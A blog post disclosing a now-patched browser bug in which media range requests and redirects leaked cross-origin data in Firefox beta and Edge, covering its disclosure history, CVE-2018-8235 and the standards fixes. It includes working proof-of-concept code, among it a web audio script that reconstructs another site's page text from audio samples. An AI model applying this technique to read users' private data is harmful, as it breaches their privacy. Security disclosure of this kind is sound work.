I discovered a browser bug
I accidentally discovered a huge browser bug a few months ago and I'm pretty excited about it. Security engineers always seem like the "cool kids" to me, so I'm hoping that now I can be part of the club, and y'know, get into the special parties or whatever.
I've noticed that a lot of these security disclosure things are only available as PDFs. Personally, I prefer the web, but if you're a SecOps PDF addict, check out the PDF version of this post.
Oh, I guess the vulnerability needs an extremely tenuous name and logo right? Here goes:
Why Wavethrough? Well, it involves wave audio, and data is allowed through that shouldn't be. Tenuous enough?
All the browser security bugs I cover in this post have since been fixed. Make sure your browser is up to date.
As I said, I stumbled into this whole thing by accident. Here's how it happened from the start:
Media via a service worker didn't quite work
If you have a service worker like this:
addEventListener('fetch', (event) => {
  event.respondWith(fetch(event.request));
});
…the idea is you shouldn't see any behavioural difference between this and no-service-worker. Unfortunately, cross-origin <video> and <audio> don't quite behave the same: seeking doesn't work, and sometimes playback fails entirely.
<video> and <audio> are different from most web APIs in that they use range requests. Ok, let's push that onto the stack:
Range requests
Usually when the browser makes a request, it's asking for the whole resource. However, HTTP defines the Range header and partial content responses. For example, the request may have the following header:
Range: bytes=50-100
…which is requesting bytes 50-100 (inclusive) of the resource. The server may then respond with a 206 Partial Content status, and a header like this:
Content-Range: bytes=50-100/5000
…indicating it's returning bytes 50-100 (inclusive) of a 5000 byte resource.
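To make the header format concrete, here's a little helper that pulls those values apart. This is purely illustrative (it isn't code from any browser, and it ignores multi-range responses):

```javascript
// A rough sketch of parsing a Content-Range response header like
// "bytes 50-100/5000". Illustrative only: real parsers also handle
// multi-range and malformed variants this simple regex rejects.
function parseContentRange(header) {
  const match = /^bytes (\d+)-(\d+)\/(\d+|\*)$/.exec(header);
  if (!match) return null;
  return {
    start: Number(match[1]),
    end: Number(match[2]),
    // The total size may be "*" if the server doesn't know it yet.
    totalSize: match[3] === '*' ? null : Number(match[3]),
  };
}

console.log(parseContentRange('bytes 50-100/5000'));
// { start: 50, end: 100, totalSize: 5000 }
```

Note the request syntax (Range: bytes=50-100) and the response syntax (Content-Range: bytes 50-100/5000) differ slightly, which catches people out.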
Browsers use this for resuming downloads, but it's also used by media elements if the user seeks the media, so it can go straight to that point without downloading everything before it, or to pick up metadata if it's one of those annoying media formats that has important metadata at the end of the file.
Unfortunately, via a service worker, that Range header was going missing (dun-dun-dunnnnnnnnn!). This is because media elements make what we call "no-cors" requests. Let's push that onto the stack too:
No-cors requests
If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that. If you want to send fancy headers, the browser checks with the origin first, before making the request with the fancy headers. This is known as CORS.
However, some APIs couldn't give a shit about all that. They make "no-cors" requests, so the checks above don't happen. If you make a no-cors request to another origin, it's sent with cookies and you get back an "opaque" response. Developers shouldn't be able to access the data of an opaque response, but particular APIs may interpret that data behind the scenes.
Take <img> for instance. If you include an <img> that points to another origin, it'll make a no-cors request to that origin using that origin's cookies. If valid image data is returned, it'll display on your site. Although you can't access the pixel data of that image, data is still leaked through the width and height of the image. You also know whether or not you received valid image data.
Let's say there's an image that's only accessible if the user is logged into a particular site. An attacker can tell from the load/error event of the <img> whether that user is logged into that site. The user's privacy has been compromised. Yaaaay.
Allowing this to happen is a mistake, but we have decades of content depending on this behaviour. We can't simply prevent it, but we can add things to mitigate it in certain situations. If we started the web again, everything would require something like CORS.
It isn't just images either. Classic non-module scripts, CSS, and media elements also make no-cors requests by default.
No-cors + ranges + service workers
So, back to our pass-through service worker:
addEventListener('fetch', (event) => {
  event.respondWith(fetch(event.request));
});
A media element would make a no-cors request with a Range header. When it's passed to fetch(), the request object is checked. At this point fetch sees a header (Range) that isn't allowed in no-cors requests, and silently removes it. Therefore the server doesn't see the Range header, so it just responds with a standard 200 response.
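Roughly, that filtering step works like this (a heavily simplified sketch of the idea; the real rules in the Fetch spec also restrict header values and have more cases):

```javascript
// Simplified sketch of how fetch strips non-safelisted headers from
// no-cors requests. The real Fetch spec rules also check header
// values (e.g. allowed Content-Type values); this just shows the idea.
const NO_CORS_SAFELIST = new Set([
  'accept',
  'accept-language',
  'content-language',
  'content-type',
]);

function filterNoCorsHeaders(headers) {
  const filtered = {};
  for (const [name, value] of Object.entries(headers)) {
    // Anything not on the safelist (like Range) is silently dropped.
    if (NO_CORS_SAFELIST.has(name.toLowerCase())) {
      filtered[name] = value;
    }
  }
  return filtered;
}

// The Range header vanishes, so the server sees a plain request:
console.log(filterNoCorsHeaders({ Accept: '*/*', Range: 'bytes=44-' }));
// { Accept: '*/*' }
```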
Why is this header filtered? Well, no one standardised how range requests were supposed to work. Actually, that deserves its own heading:
Range requests were never standardised
They're standardised in HTTP, but not by HTML. We know what the headers look like, and when they should appear, but there's nothing to say what a browser should actually do with them.
- Should all media requests be range requests, or just additional requests?
- What happens if the returned range ends sooner/later than what the browser asked for?
- What happens if the returned range starts sooner/later than what the browser asked for?
- What happens if a range is requested but the server returns a normal 200 response?
- What happens if a range is requested but the server returns a redirect?
- What happens if the underlying content appears to have changed between requests?
- What happens if a normal request is made but a 206 partial is returned?
None of this is defined, so browsers all kinda do different things. Yay.
We couldn't just add the Range header to the safelist, as developers would be able to set it to values the browser would never usually send, and that presents a security risk.
Also, with a service worker in the middle, you can respond to a request however you want, even if it's a no-cors request to another origin. For example, you can have an <img> on your page that points to facebook.com, but your service worker could return data from twitter.com. This isn't a problem, as you can only lie to yourself.
However, media elements piece multiple responses together and treat it as a single resource, and that opens up an interesting attack vector: Can known data be mixed with unknown data to reveal the content of the unknown data?
I pretended to be a hacker and wrote down all the attacks I could think of, and Anne van Kesteren pointed out that some of them were possible without a service worker, as you can do similar things with redirects. So, I investigated how browsers currently handle these situations.
Mixing known and unknown data
- The page: Hey, this audio tag needs audio data from "/whatever.wav".
- The attacker's server: No problem, here's 44 bytes of data.
- The page: Cool, I see this is a PCM WAV header, 1 channel, 44100hz, 8bit, 30mins long. However, that's not enough data, can you send me Range: 44- please?
- The attacker's server: Oh, get that from facebook.com/ instead.
- The page: Ok. Hey facebook.com/, here are your cookies, can I get Range: 44- please?
- facebook.com: Sure, here you go…

I created a site that does the above. I used a PCM wav header because everything after the header is valid data, and whatever Facebook returned would be treated as uncompressed audio.
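The demo site itself isn't reproduced here, but the 44-byte PCM WAV header it serves can be built with a DataView. This is my own sketch of that step, using the field values from the conversation above:

```javascript
// A sketch of building the 44-byte PCM WAV header used in the attack:
// everything that follows these 44 bytes is treated as raw samples.
// This is my own reconstruction, not the demo's actual code.
function buildWavHeader({ channels, sampleRate, bitsPerSample, dataSize }) {
  const buffer = new ArrayBuffer(44);
  const view = new DataView(buffer);
  const writeStr = (offset, str) => {
    for (let i = 0; i < str.length; i++) {
      view.setUint8(offset + i, str.charCodeAt(i));
    }
  };
  const byteRate = (sampleRate * channels * bitsPerSample) / 8;

  writeStr(0, 'RIFF');
  view.setUint32(4, 36 + dataSize, true); // file size minus 8
  writeStr(8, 'WAVE');
  writeStr(12, 'fmt ');
  view.setUint32(16, 16, true); // fmt chunk size
  view.setUint16(20, 1, true); // format 1 = uncompressed PCM
  view.setUint16(22, channels, true);
  view.setUint32(24, sampleRate, true);
  view.setUint32(28, byteRate, true);
  view.setUint16(32, (channels * bitsPerSample) / 8, true); // block align
  view.setUint16(34, bitsPerSample, true);
  writeStr(36, 'data');
  view.setUint32(40, dataSize, true); // bytes of sample data to follow
  return new Uint8Array(buffer);
}

// 1 channel, 44100hz, 8-bit, claiming ~30 minutes of data to follow:
const header = buildWavHeader({
  channels: 1,
  sampleRate: 44100,
  bitsPerSample: 8,
  dataSize: 44100 * 60 * 30,
});
```

Because the declared format is uncompressed PCM, there's no framing to get wrong: any bytes at all are "valid" audio.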
In my opinion, browsers should reject the response from Facebook, as the media element shouldn't allow mixing visible and opaque data. Nor should it allow opaque data from multiple sources, although that isn't happening here.
Chrome and Safari rejected the response as soon as they saw the redirect. This is safe, although they would also need to check the response if a service worker was in the middle, since that can produce a response from somewhere else without a redirect occurring.
However…
Firefox security bug
Beta and nightly versions of Firefox at the time allowed the redirect, combined the responses together, and exposed the duration of the audio through mediaElement.duration.
Because I set the frequency, bit depth, and channel count of the audio in the header, I could determine the length of the cross-origin resource from the audio length using ✨basic maths✨.
const contentLength =
  audio.duration * /* WAV frequency */ 44100 + /* WAV header length */ 44;
It looks like the size isn't detected exactly, but Google returns a range, so the reported size includes the extra 44 bytes that are missing from the start (the WAV header).
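Plugging made-up numbers into that formula shows how directly duration maps to size:

```javascript
// Working the maths with made-up numbers: 8-bit mono audio is one
// byte per sample, so duration maps straight to a byte count.
const duration = 10; // seconds, as reported by mediaElement.duration
const contentLength = duration * 44100 + 44; // samples + WAV header
console.log(contentLength); // 441044
```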
And here's a link to the attack, which works in Firefox 59.0b9 at least.
Leaking the length of a resource may not sound like a big deal, but consider an endpoint like gender.json. The content length can give a lot away. Also see Timing attacks in the Modern Web (PDF, heh), which demonstrates the amount of information content-length can leak.
Firefox handled this brilliantly. Within three hours Paul Adenot replied to the bug report, confirming it, and dug into other potential leaks (there weren't any). I was able to engage with engineers directly on how the issue should be fixed, which was important as I was planning how to standardise the mitigation.
Since this was a regression caught in beta, Firefox were able to patch it before it reached stable.
Edge security bug
Edge suffered from the same kind of bug, but with a huge twist. Firstly, it didn't care if the other server returned a 206 or not. Secondly, and this is the big one, it allowed the resulting audio to pass through the web audio API. The web audio API is like the <canvas> equivalent for audio, meaning I could monitor the samples being played:
// Get the audio element.
const audio = document.querySelector('audio');
// Create a web audio context.
const ac = new AudioContext();
// Connect the two.
const source = ac.createMediaElementSource(audio);
// Create a script processor.
// This lets me transform the audio data. I don't really care
// about transforming, I just want to collect the data.
const scriptNode = ac.createScriptProcessor(256, 1, 1);
const datas = [];

scriptNode.onaudioprocess = (event) => {
  const inputData = event.inputBuffer.getChannelData(0);
  // Store the audio data.
  if (!audio.paused) datas.push(inputData.slice());
};

// Connect the processor.
source.connect(scriptNode);
scriptNode.connect(ac.destination);

audio.addEventListener('ended', (event) => {
  source.disconnect(scriptNode);
  scriptNode.disconnect(ac.destination);

  // Now I can look at all the data received, and turn it from
  // audio sample data, back into bytes, then into a string.
  const str = datas.reduce((str, data) => {
    // Each sample is -1 to 1.
    // In the original wav it was 16-bits per sample,
    // so I map each value to a signed 16-bit value.
    const ints = Array.from(data).map((num) => Math.round(num * 32768));
    // Then put that into a typed array.
    const int16 = new Int16Array(ints);
    // But, assuming utf-8, I need unsigned 8-bit chunks:
    const bytes = new Uint8Array(int16.buffer);
    // Now I can create a string from that.
    return (
      str +
      Array.from(bytes)
        .map((b) => String.fromCharCode(b))
        .join('')
    );
  }, '');

  // Output the data.
  document.body.appendChild(document.createTextNode(str));
});
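To sanity-check that decode step, here's the same sample-to-string conversion pulled out as a standalone function, with a made-up round trip: bytes in, samples through the -1 to 1 range, bytes back out. This is my own check, not part of the original demo:

```javascript
// Standalone version of the decode step above, plus a round trip to
// show it recovers the original bytes.
function samplesToString(samples) {
  // Map each -1 to 1 sample back to a signed 16-bit value…
  const ints = Array.from(samples).map((num) => Math.round(num * 32768));
  // …then reinterpret those 16-bit values as unsigned bytes.
  const bytes = new Uint8Array(new Int16Array(ints).buffer);
  return Array.from(bytes)
    .map((b) => String.fromCharCode(b))
    .join('');
}

// Simulate what the media element does: treat bytes of text as
// 16-bit samples and normalise them to the -1 to 1 range.
const original = 'Hi';
const bytes = new Uint8Array([...original].map((c) => c.charCodeAt(0)));
const samples = Array.from(new Int16Array(bytes.buffer)).map((s) => s / 32768);

console.log(samplesToString(samples)); // "Hi"
```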
And here's what that looks like:
The text you see is the content of BBC News. Since the request is made with cookies, the content is the "logged in" view, although I wasn't logged in for the demo.
It's kinda pathetic how excited I got about this, but this is a huge bug. It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing.
And here's a link to the attack. If this works in your version of Edge, update your browser immediately.
Reporting the bug to Microsoft
You're about to witness a boy in his mid-30s having a massive entitled whinge. If you want to avoid that, skip this section, but I really need to get it off my chest. The experience I had with Microsoft was very different to Firefox.
I filed the issue in Edge's bug tracker on March 1st and notified secure@microsoft.com. I got an email from Microsoft security later that day saying that they don't have access to Edge's bug tracker, and asked if I could paste the details into an email for them. So yeah, Microsoft's security team don't have visibility into Edge security issues. Anyway, I sent them the details of the exploit over plain email. Update: Turns out when you file a security bug with Edge, you get a special URL only the reporter can access. I didn't know this was the case, and it didn't seem like the security contact at MS knew either.
The next day they said they couldn't investigate the issue unless I provided the source code. C'mon folks, the "view source" button is right there. Anyway, I sent them the source. Then there were 20 days of silence.
At this point I had no idea if they were able to understand the issue, or if they knew how serious it was. I pointed out that the attack could be used to read people's private messages, but received no response.
Update: 16 days into the silence I sent a further email "Is it ok if I present this exploit at a conference next week?". I wasn't booked to speak at any conference, I was just trying to elicit a response, to get some indication that the lights were on. It didn't work. I recently found out Microsoft characterised this as a threat.
I asked Jacob Rossi and Patrick Kettner (awesome folks who work on the Edge team) if they could chase it internally. After they did, I finally got a reply from Microsoft security saying they were "developing a fix", with no further detail.
If you find a bug like this, you're eligible for a bounty. I asked if I could nominate a charity or two to receive the bounty. There was no response. 14 days of silence.
I asked Patrick to chase them again (thanks Patrick!), and they replied saying they wouldn't be able to give the bounty to charity, despite their public docs saying otherwise. Apparently the rules changed at some point, and I was looking at old docs. Whatever. Thankfully Google are ok with me taking the money directly, and will match what I donate (I found the bug while at work, so I was worried about the legal implications of taking the money. I'm sure there'll be some tax complications too, ugh).
I wasn't getting any progress update, or any details on how they planned to fix it (which would have been useful from a standards perspective). So, I shitposted on Twitter, and Jun Kokatsu kinda sniped back. Jun is a security engineer at Edge, and we got chatting over DMs. And holy shit, this is who I should have been talking to all along.
Jun told me there had been a lot of activity around the bug internally, and they're looking to improve visibility of this kind of stuff to the reporter. We were able to discuss what the fix would look like, and how that would work with a service worker in the middle. I really can't stress enough how helpful Jun has been.
Microsoft released a patch for the bug, and published CVE-2018-8235. I found out about this through Jun. I haven't heard anything through the official channel.
On June 7th I asked the official contact for an update on the bug bounty, since they haven't confirmed any of that yet. I've yet to receive a reply. Update: Shortly after publishing this they contacted me to say I qualify for the bounty.
Ok, that was a lot of complaining, but I really want Microsoft to look at the experience I had with Firefox and learn from it. Security issues like this put their users at huge risk, and they need to ensure reporting these things isn't more effort than it's worth.
Standards are important
I've covered two browser security issues here, but these bugs started when browsers implemented range requests for media elements, which wasn't covered by the standard. These range requests were genuinely useful, so all browsers implemented them by copying each other's behaviour, but no one integrated them into the standard.
The result is the browsers all behave slightly differently, and some ended up with security issues.
This is why standards are important. Chrome had a similar security issue a few years ago, but instead of just fixing it in Chrome, the fix should have been written into a standard, and tests should have been written for other browsers to check against.
I've been working to improve standards here. Range requests are now able to pass through a service worker safely according to the spec. The next step is to specify the request and response handling for media elements.
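With that specced, a service worker can also choose to satisfy range requests itself, by slicing up a full response it already has. Here's a rough sketch of the parsing side (my own simplified helper; real Range headers can carry multiple ranges and suffix forms like "bytes=-500", which this ignores):

```javascript
// Simplified parser for a request's Range header, e.g. "bytes=44-"
// or "bytes=50-100". A service worker could use the result to slice
// a cached body and build a 206 response. Illustrative only.
function parseRangeHeader(value, totalSize) {
  const match = /^bytes=(\d+)-(\d*)$/.exec(value);
  if (!match) return null;
  const start = Number(match[1]);
  // An open-ended range ("44-") runs to the end of the resource.
  const end = match[2] === '' ? totalSize - 1 : Number(match[2]);
  // Unsatisfiable ranges should get a 416, not a slice.
  if (start > end || end >= totalSize) return null;
  return { start, end };
}

console.log(parseRangeHeader('bytes=44-', 5000)); // { start: 44, end: 4999 }
console.log(parseRangeHeader('bytes=50-100', 5000)); // { start: 50, end: 100 }
```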
Also, CORB has been added to fetch. The aim here is to reduce the capabilities of no-cors while retaining compatibility with the web. For instance:
<img src="https://facebook.com/secret-data.json" />
Previously, the above would fail to load, but the response would be in the same process as the rest of the page. This is a really bad thing given Spectre and Meltdown. But CORB will prevent that resource from entering the page's process, since its content (JSON) isn't something that can be loaded by any no-cors API.
CORB also prevents the attack outlined in this post, as it wouldn't allow text/html content to enter the process as the result of a no-cors request.
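The blocking decision is, very roughly, based on the response's type. Here's a heavily simplified sketch of the idea (the real CORB algorithm in the fetch spec also sniffs response bodies and has many more cases):

```javascript
// Heavily simplified sketch of the CORB idea: block no-cors
// responses whose type could never be valid for a no-cors consumer
// (images, media, scripts). Not the real algorithm, just the shape.
const CORB_PROTECTED_TYPES = ['text/html', 'text/xml', 'application/json'];

function corbShouldBlock({ mode, contentType }) {
  // CORS responses are permission-checked anyway; CORB targets no-cors.
  if (mode !== 'no-cors') return false;
  return CORB_PROTECTED_TYPES.some((type) => contentType.startsWith(type));
}

// The attack's stolen response was HTML, so it never reaches the page:
console.log(corbShouldBlock({ mode: 'no-cors', contentType: 'text/html' })); // true
console.log(corbShouldBlock({ mode: 'no-cors', contentType: 'image/png' })); // false
```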
And that's it! I now have a CVE number I can have etched on my grave. And I'm going to sit here and patiently await my invite to all the cool security parties.
Thanks to Sandra and Monica Stromann, whose icons I butchered to create the Wavethrough logo. Also thanks to Mathias Bynens, Jun Kokatsu, and Paul Lewis for proofreading & corrections.